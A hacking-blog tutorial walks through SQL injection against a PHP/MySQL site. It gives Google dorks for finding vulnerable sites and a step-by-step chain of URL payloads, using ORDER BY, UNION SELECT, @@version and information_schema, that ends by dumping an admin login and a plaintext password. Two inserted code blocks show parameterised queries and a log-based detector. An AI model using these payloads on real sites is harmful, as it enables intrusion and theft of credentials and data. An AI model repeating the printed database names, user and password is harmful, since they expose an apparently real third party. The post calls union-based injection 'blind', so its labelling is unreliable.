Wednesday, February 27, 2013

Exploiting Web Applications by Manual Blind SQL Injection (Step By Step Tutorial)

Hello Readers, today I am sharing with you how to exploit a web application with a manual Blind SQL Injection attack. The manual Blind SQL Injection technique is a time-consuming process. In my last post we discussed the SQL Injection attack. In this post we'll discuss Blind SQL Injection and how the attack can be carried out, showing step by step how to find the vulnerable point and how to perform manual blind SQL injection. First we need to know....






WHAT IS BLIND SQL INJECTION?


When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection more difficult but not impossible: an attacker can still extract data by asking a series of true/false questions through SQL statements and observing how the page responds.



* To successfully launch any Blind SQL injection attack, it is of paramount importance to know the exact DBMS the application is using. Without that piece of information, it is impossible to fine-tune the injected queries and extract the data we are interested in.


IDENTIFYING THE DATABASE

The Web application technology will give us our first hint. For instance, ASP and .NET often use Microsoft SQL Server as the back-end database. On the other hand, a PHP application is likely to be using MySQL. If the application is written in Java, it probably talks to an Oracle or a MySQL database.



Step-by-Step Tutorial for Blind SQL Injection


The manual Blind SQL Injection technique is a time-consuming process. First we need a vulnerable site to attack; this is the first step in Blind SQL injection exploitation. After finding a vulnerable web application we need to find a Blind SQL injection point in it. We can add a single quotation mark at the end of the URL. If the web application shows an error, we have found the right SQL injection point.



[Step – 1] Find  Blind SQL Injection Vulnerable Website


We can find vulnerable websites (hackable websites) using Google Dorks. A Google Dork is a search for vulnerable websites using Google search tricks. There are a lot of tricks to search with in Google, but we are going to use the "inurl:" operator to find the vulnerable websites.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is a huge list of Google Dorks.

Download: Google Dorks List



Next we find a Blind SQL injection point in the vulnerable web application. We add a single quotation mark at the end of the URL; if the web application shows an error, we have found the right SQL injection point.

For example, we have a vulnerable web application http://www.victimsite.com


We need to find an SQL injection point in order to exploit this web application.


We add an apostrophe ['] at the end of the URL and get an error:

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right
syntax to use near ''' at line 1

You can see the error page in the image below.
              




[Step-2] Finding Columns & The Vulnerable Columns


After finding the error page we need to enumerate the number of columns, and then which of those columns display the values we supply. To check how many columns there are we use ORDER BY (written as order+by or order by in the URL): it tells the database to sort the result by the column at that integer position (e.g. 1 or 2). No error means a column exists at that position; an error means it does not.
 
http://www.victimsite.com/news-and-events.php?id=22 order by 1--

http://www.victimsite.com/news-and-events.php?id=22 order by 2--

http://www.victimsite.com/news-and-events.php?id=22 order by 3--

http://www.victimsite.com/news-and-events.php?id=22 order by 4--

http://www.victimsite.com/news-and-events.php?id=22 order by 5--

http://www.victimsite.com/news-and-events.php?id=22 order by 6--

http://www.victimsite.com/news-and-events.php?id=22 order by 7--

http://www.victimsite.com/news-and-events.php?id=22 order by 8-- (page returns an error)



         
Keep increasing the number after order by until we get an error. The highest number that does not produce an error is the number of columns returned by the original query, here 7. Next we find which of those column positions echo our values back into the page.



[Step-3]  Finding Vulnerable Column
 


We now need to find out which of those seven columns are vulnerable. Vulnerable columns are the positions whose values the page displays, so anything we place there through the URL is rendered in the response. A UNION SELECT (union+select in the URL) appends our own row of values to the original query's result, and the page shows whichever of those values land in the displayed columns.



Append a UNION SELECT or UNION ALL SELECT statement to the URL, listing one value per column. In the step above we found that the query has 7 columns:


http://www.victimsite.com/news-and-events.php?id=22 UNION ALL SELECT 1,2,3,4,5,6,7

Sometimes the page will return and look completely normal, which is not a problem. On some sites you have to null the value you are injecting into: in simpler terms, the id=22 in the URL above must match no rows, so that the page displays our UNION row instead of the original record. So we simply put a hyphen (minus sign) before the 22, i.e. id=-22. The URL should now look like this:

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,5,6,7

The result of this query shows the column positions that are displayed on the page. We get 2, 3 and 5. Now we will inject our SQL statements into one of these columns, as in the image below.
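As an added example that is not part of the original post, the following Python script replays the three probes used so far (the trailing apostrophe, ORDER BY with an increasing column position, and UNION ALL SELECT with a negated id) against a constructed seven-column table, once through a query built by string concatenation as news-and-events.php evidently does, and once through a query that validates id as an integer and binds it as a parameter. SQLite is used as a stand-in for the MySQL back end so that it runs offline; its error text therefore differs from the MySQL message quoted above, and the table, column names and rows are constructed.

```python
"""Added example (not from the original post): the same id= parameter handled
two ways against an in-memory SQLite table. SQLite stands in for the MySQL
back end the post describes, so its error text differs from MySQL's; the
table, column names and rows below are constructed for the example."""
import sqlite3

# Constructed sample schema with seven columns, matching the post's example
# where ORDER BY 7 succeeds and ORDER BY 8 fails.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                   author TEXT, published TEXT, status INTEGER, tags TEXT);
INSERT INTO news VALUES (22, 'Annual report', 'text', 'editor',
                         '2013-02-27', 1, 'news');
""")

COLUMNS = "id, title, body, author, published, status, tags"


def vulnerable_lookup(raw_id: str):
    """Builds the statement by concatenating the raw parameter, which is how
    the vulnerable page must be doing it. Returns ('ok', rows) or
    ('error', message); the error is what the apostrophe probe triggers."""
    sql = "SELECT " + COLUMNS + " FROM news WHERE id=" + raw_id
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:  # MySQL would raise its own syntax error here
        return "error", str(exc)


def safe_lookup(raw_id: str):
    """Validates the id as an integer, then binds it as a parameter. The
    input can no longer change the structure of the statement, so ORDER BY
    and UNION fragments are rejected before they reach the database."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return "rejected", None
    sql = "SELECT " + COLUMNS + " FROM news WHERE id=?"
    return "ok", conn.execute(sql, (id_value,)).fetchall()


def probe_both(raw_id: str):
    """Outcome of one payload against the vulnerable and the safe lookup."""
    return vulnerable_lookup(raw_id)[0], safe_lookup(raw_id)[0]


if __name__ == "__main__":
    # The payloads are the ones the tutorial uses, in the same order.
    for payload in ("22", "22'", "22 order by 7--", "22 order by 8--",
                    "-22 UNION ALL SELECT 1,2,3,4,5,6,7"):
        print(repr(payload), probe_both(payload))
```

Run it and the concatenated version reports an error for 22' and for order by 8-- and returns the injected row 1..7 for the UNION payload, which is exactly the signal the tutorial reads from the page; the parameterised version returns the record for 22 and rejects everything else. The integer check is defence in depth: binding alone already stops the injection, because a bound value can only ever be compared with id, never parsed as SQL.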


                         


[Step-3]Enumerating The SQL Or Database Version



We now use @@version or version() (and in some cases a series of commands) to determine which SQL version the site runs: MySQL version 4 or version 5. See the example below of what the URL looks like when the version function is inserted in place of the number 5, since 5 is the vulnerable column on the example site.

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,@@version,6,7

If the above fails and the site just returns an error or displays normally, then we need to use the convert function for the server to display the value. Don't worry, this is usually the only thing you need to convert, and it is only rarely required. So, if the example site returned an error, we replace @@version with the convert() function:

Function: convert(@@version using latin1)
 
So the example site will now look like this:

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,convert(@@version using latin1),6,7

If the page still does not return the version, the value must be passed through hex encoding and back: unhex(hex(@@version))

So the example site will now look like this:

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,unhex(hex(@@version)),6,7

Depending on which MySQL version the server runs, 4 or 5, the queries for obtaining data are different (the information_schema database used in the following steps exists only from MySQL 5 onward).

We get the version of the database in the place where the number 5 was displayed. See the image below for details.


        


[Step-4]Exploit To Get List Of Databases



To get the list of databases we put group_concat(schema_name) in column number 5 and at the end of the URL add from information_schema.schemata--, as in the URL below.


http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,group_concat(schema_name),6,7 from information_schema.schemata--


The result will display the list of databases on the site. From here on we note the results we got from our test.

Result: information_schema, nilakantatrust

We can see database names in below image.













[Step-5]To Know Current Database In Use



We use concat(database()) in column number 5 to get the name of the database currently in use.



http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,concat(database()),6,7

Result: nilakantatrust

We can see current database name in below image.








[Step-6]Get The Current User

We can use concat(user()) in column number 5 to get the user name. It returns a single value: the database account the application connects as.

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,concat(user()),6,7--

Result: rmishra@localhost

We can see user name in below image.














[Step-7] Get The Tables

We use group_concat(table_name) in column number 5 and at the end of the URL add from information_schema.tables where table_schema=database()--

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database()--

We get the names of all tables in the "nilakantatrust" database.



Result: est_achievement, est_admin,est_adminlog, est_companyrecord, est_facprofile, est_news, est_notice, est_onlineapplication, est_placementrecord

We can see the table names in the image below.


  


[Step-8] Get The Columns

http://www.victimsite.com/news-and-events.php?id=-22 UNION ALL SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_schema=database()--

Result: ach_id,ach_title, ach_detail, ach_type, ach_date, ach_status, ach_pdf, uid, userid, password, emailid, signature, last_login, uid, ipaddress, act_date, module, action, description, c_snum, c_name, c_photo, fac_snum, fac_name, fac_designation, fac_dept, fac_qualification, fac_email, fac_phone, fac_residence, fac_photo, fac_experience, fac_publication, fac_uid, fac_pwd,news

We can see all the column names in the image below.














[Step-9] Extracting Column Data

Suppose we want to extract userid and password. Then we use concat(userid,0x3a,password) in column number 5 (0x3a is the hex code for ':', used as a separator) and at the end of the URL add from est_admin:

http://www.victimsite.com/news-and-events.php?id=-22 UNION SELECT 1,2,3,4,concat(userid,0x3a,password),6,7 from est_admin

Result: trustadmin:tru$t@9!5!
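Seen from the server side, every step above leaves a request in the web server's access log, and the sequence is distinctive: one client walks order by 1 through order by 8, then sends UNION ALL SELECT with numeric placeholders, then @@version, then information_schema queries. (Note that these steps rely on the page displaying the UNION row and the MySQL error text, so they are in-band union-based injection rather than blind injection in the strict sense described at the top of the post; the detection is the same either way.) The following Python detector is an added example, not part of the original post: it decodes the query string of constructed Apache-style log lines (the IP addresses, timestamps and paths are made up) and flags clients that match the signatures the tutorial itself uses. Two further findings a defender would record from Step 9 are that the application's database account can read est_admin and that the password was stored in plaintext; parameterised queries, a least-privileged database account and hashed password storage each close part of that chain.

```python
"""Added example (not from the original post): a small detector that replays
the enumeration sequence from the tutorial against constructed web-server
access-log lines. The log format, IP addresses, timestamps and paths are
constructed; the signatures are the tokens the post itself uses."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in Apache common log format. Query strings are
# URL-encoded the way a browser would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2013:10:01:01 +0000] "GET /news-and-events.php?id=22 HTTP/1.1" 200 5120
203.0.113.5 - - [27/Feb/2013:10:01:09 +0000] "GET /news-and-events.php?id=22%27 HTTP/1.1" 200 812
203.0.113.5 - - [27/Feb/2013:10:01:15 +0000] "GET /news-and-events.php?id=22%20order%20by%201-- HTTP/1.1" 200 5120
203.0.113.5 - - [27/Feb/2013:10:01:19 +0000] "GET /news-and-events.php?id=22%20order%20by%207-- HTTP/1.1" 200 5120
203.0.113.5 - - [27/Feb/2013:10:01:23 +0000] "GET /news-and-events.php?id=22%20order%20by%208-- HTTP/1.1" 200 812
203.0.113.5 - - [27/Feb/2013:10:02:02 +0000] "GET /news-and-events.php?id=-22%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7 HTTP/1.1" 200 4990
203.0.113.5 - - [27/Feb/2013:10:02:40 +0000] "GET /news-and-events.php?id=-22%20UNION%20ALL%20SELECT%201,2,3,4,@@version,6,7 HTTP/1.1" 200 5001
203.0.113.5 - - [27/Feb/2013:10:03:12 +0000] "GET /news-and-events.php?id=-22%20UNION%20ALL%20SELECT%201,2,3,4,group_concat(schema_name),6,7%20from%20information_schema.schemata-- HTTP/1.1" 200 5030
198.51.100.7 - - [27/Feb/2013:10:03:30 +0000] "GET /news-and-events.php?id=23 HTTP/1.1" 200 5200
198.51.100.7 - - [27/Feb/2013:10:03:45 +0000] "GET /gallery.php?id=4 HTTP/1.1" 200 7400
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)')

# Each signature is (name, regex applied to the decoded query string).
SIGNATURES = [
    ("quote_probe", re.compile(r"\d'$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_fingerprint", re.compile(r"@@version|\bversion\(\)", re.I)),
    ("schema_enumeration", re.compile(r"information_schema\.|group_concat\(", re.I)),
]


def parse_line(line):
    """Return (client ip, URL-decoded query string), or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("url")).query
    return m.group("ip"), unquote_plus(query)


def classify(query):
    """Names of the signatures matched by one decoded query string."""
    return [name for name, rx in SIGNATURES if rx.search(query)]


def analyse(log_text):
    """Aggregate per client: matched signatures, distinct ORDER BY positions
    and request count. Counting positions makes a walk from 'order by 1' to
    'order by 8' stand out even though each request looks minor on its own."""
    per_ip = defaultdict(lambda: {"signatures": set(),
                                  "order_by_terms": set(), "requests": 0})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, query = parsed
        entry = per_ip[ip]
        entry["requests"] += 1
        entry["signatures"].update(classify(query))
        for term in re.findall(r"\border\s+by\s+(\d+)", query, re.I):
            entry["order_by_terms"].add(int(term))
    return per_ip


def suspicious_clients(per_ip, min_order_by_terms=2):
    """Clients that used a UNION/schema/version signature or stepped through
    several ORDER BY positions. Returns {ip: sorted signature names}."""
    strong = {"union_select", "version_fingerprint", "schema_enumeration"}
    flagged = {}
    for ip, e in per_ip.items():
        if e["signatures"] & strong or len(e["order_by_terms"]) >= min_order_by_terms:
            flagged[ip] = sorted(e["signatures"])
    return flagged


if __name__ == "__main__":
    for ip, sigs in suspicious_clients(analyse(SAMPLE_LOG)).items():
        print(ip, sigs)
```

Matching a single request against these signatures is noisy (a literal order by can appear in legitimate parameters), which is why analyse() also counts distinct ORDER BY positions per client and suspicious_clients() requires either a strong signature or several positions before flagging. The decode step matters as well: the same payloads arrive as %20, + or mixed case, so matching on the raw URL would miss most of them.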









* In my next post we will discuss the Automated Blind SQL Injection attack.




 
Written by Ankit Bhandari

Hello, my name is Ankit Bhandari. You can visit and learn ethical hacking from my blog, but all these hacking tricks are for educational purposes only. Neither I nor my blog is responsible for any wrong use of them. Enjoy it but never misuse it.


© 2014 Invisible Hackers. All rights Reserved. Designed by InvisibleHackers